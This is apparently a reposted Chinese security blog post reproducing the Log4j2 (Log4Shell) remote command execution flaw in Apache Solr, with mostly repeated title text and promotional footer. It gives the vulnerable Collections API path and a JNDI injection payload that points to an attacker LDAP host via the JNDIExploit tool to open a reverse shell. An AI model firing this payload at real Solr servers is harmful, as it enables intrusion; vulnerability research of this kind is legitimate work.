Log4j2 漏洞探索之一:Apache Solr 远程命令执行

渗透技巧 2年前 (2021) admin
2,146 0 0
Log4j2 漏洞探索之一:Apache Solr 远程命令执行
Log4j2 漏洞探索之一:Apache Solr 远程命令执行


Log4j2 漏洞探索之一:Apache Solr 远程命令执行


Log4j2 漏洞探索之一:Apache Solr 远程命令执行
Log4j2 漏洞探索之一:Apache Solr 远程命令执行


Log4j2 漏洞探索之一:Apache Solr 远程命令执行



Log4j2 漏洞探索之一:Apache Solr 远程命令执行
Log4j2 漏洞探索之一:Apache Solr 远程命令执行

:漏洞描述?




经过Log4j2漏洞的出现,攻击面逐渐被展开,同时 Apache Solr 也用到了此组件,能通过发送特定的请求包造成远程命令执行



兄弟篇 – log4j2漏洞探索之一:Apache Struts2框架静态文件访问带来的漏洞隐患


Log4j2 漏洞探索之一:Apache Solr 远程命令执行


Log4j2 漏洞探索之一:Apache Solr 远程命令执行
Log4j2 漏洞探索之一:Apache Solr 远程命令执行

二:  漏洞影响?





Apache Solr



Log4j2 漏洞探索之一:Apache Solr 远程命令执行
Log4j2 漏洞探索之一:Apache Solr 远程命令执行

三:  漏洞复现?





根据官方文件可以得知 Collections 的调用参数


Log4j2 漏洞探索之一:Apache Solr 远程命令执行




我们可以设想通过可控的 Collections 来进行 JNDI注入,路径为

/solr/admin/collections?action=xxxxx


Log4j2 漏洞探索之一:Apache Solr 远程命令执行




可以使用工具 https://github.com/feihong-cs/JNDIExploit 进行反弹Shell操作


/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json


Log4j2 漏洞探索之一:Apache Solr 远程命令执行


Log4j2 漏洞探索之一:Apache Solr 远程命令执行
Log4j2 漏洞探索之一:Apache Solr 远程命令执行

 四:  关于文库?



https://www.yuque.com/peiqiwiki



Log4j2 漏洞探索之一:Apache Solr 远程命令执行

最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐


同时知识星球也开放运营啦,希望师傅们支持支持啦?

知识星球里会持续发布一些漏洞公开信息和技术文章~

Log4j2 漏洞探索之一:Apache Solr 远程命令执行



由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。





原文始发于微信公众号(PeiQi文库):Log4j2 漏洞探索之一:Apache Solr 远程命令执行

版权声明:admin 发表于 2021年12月12日 下午12:26。
转载请注明:Log4j2 漏洞探索之一:Apache Solr 远程命令执行 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...